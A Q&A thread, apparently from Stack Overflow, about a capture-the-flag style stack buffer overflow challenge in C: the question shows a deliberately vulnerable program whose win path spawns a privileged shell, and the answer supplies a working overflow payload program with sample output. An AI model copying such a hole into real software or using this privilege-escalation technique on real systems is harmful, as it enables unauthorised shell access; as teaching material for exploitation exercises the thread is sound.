Stuck at hacking challenge in C (Stack buffer overflow)
I'm trying to overrun this buffer. I ran it like this: command here, but the value is not correct. I tried various inputs with which I actually overran the buffer but instead of my expected value of the check variable 0xdeadbeef the value is something like this: 0x73737373. What am I supposed to Input so that the value of check is 0xdeadbeef?
Here's the code:
#include <unistd.h>
#include <sys/types.h>
#include <stdlib.h>
#include <stdio.h>
int main()
{
int var;
int check = 0x04030201;
char buf[40];
fgets(buf,45,stdin);
printf("\n[buf]: %s\n", buf);
printf("[check] %p\n", check);
if ((check != 0x04030201) && (check != 0xdeadbeef)) //I'm only able to achieve this
printf ("\nYou are on the right way!\n");
if (check == 0xdeadbeef) //this is the value I want to have
{
printf("Yeah dude! You win!\nOpening your shell...\n");
setreuid(geteuid(), geteuid());
system("/bin/bash");
printf("Shell closed! Bye.\n");
}
return 0;
}
I get the programm to change the value of check but can't get it to change to 0xdeadbeef.
Heres the assembly dump:
0x08048546 <+0>: lea 0x4(%esp),%ecx
0x0804854a <+4>: and $0xfffffff0,%esp
0x0804854d <+7>: pushl -0x4(%ecx)
0x08048550 <+10>: push %ebp
0x08048551 <+11>: mov %esp,%ebp
0x08048553 <+13>: push %esi
0x08048554 <+14>: push %ebx
0x08048555 <+15>: push %ecx
0x08048556 <+16>: sub $0x3c,%esp
0x08048559 <+19>: call 0x8048480 <__x86.get_pc_thunk.bx>
0x0804855e <+24>: add $0x1aa2,%ebx
0x08048564 <+30>: movl $0x4030201,-0x1c(%ebp)
0x0804856b <+37>: mov -0x4(%ebx),%eax
0x08048571 <+43>: mov (%eax),%eax
0x08048573 <+45>: sub $0x4,%esp
0x08048576 <+48>: push %eax
0x08048577 <+49>: push $0x2d
0x08048579 <+51>: lea -0x44(%ebp),%eax
0x0804857c <+54>: push %eax
0x0804857d <+55>: call 0x80483c0 <fgets@plt>
0x08048582 <+60>: add $0x10,%esp
0x08048585 <+63>: sub $0x8,%esp
If any of you can help me with this I'd be glad!
DrNotch1 Answer
The trick is to create the right input for the program.
This is hard to impossible by just typing in things from the keyboard.
You could consult an ASCII table and some tricks to enter non-printable characters.
But it is easier to just make a program which does the right output and pipe it into the program to cheat.
Depending on endianess, either this code or one with reordered last four characters (not counting the newline) should do the trick.
#include <stdio.h>
int main()
{ printf("1234567890123456789012345678901234567890\xef\xbe\xad\xde\n"); /* works for me */
/* or \xde\xad\xbe\xef */
return 0;
}
Note that the '"\xnn"' is syntax for explicitly giving the hex value of a character (within a string) to output.
Compile it into an exectable "output" and use it to feed the needed output into the "target" executable like
output | target
output (removed the shell opening part):
[buf]: 1234567890123456789012345678901234567890´¥¡Ì
[check] deadbeef
Yeah dude! You win!
Opening your shell...
Shell closed! Bye.
Note I did this on Windows, but I hope I "transposed" it well enough to Nix.
If you are forced to use a provided shell and cannot execute self-written programs (probably the point), you need to explore your options to get that output fed into the program to cheat. Using some finetuned echo might do the trick. Or you might end up having to do the ASCII non-printable input thing after all.
Without knowing more about the available environment I cannot finally solve the problem.
You will have to experiment and research. This is by the way why I am comfortable with helping you as much with your assignment as I did above, because you still have to do what I consider the core of it yourself. In my opinon this matches the accepted compromise for helping with homework/assignment questions, as described here:
How do I ask and answer homework questions?
YunnoschUser contributions licensed under CC BY-SA 3.0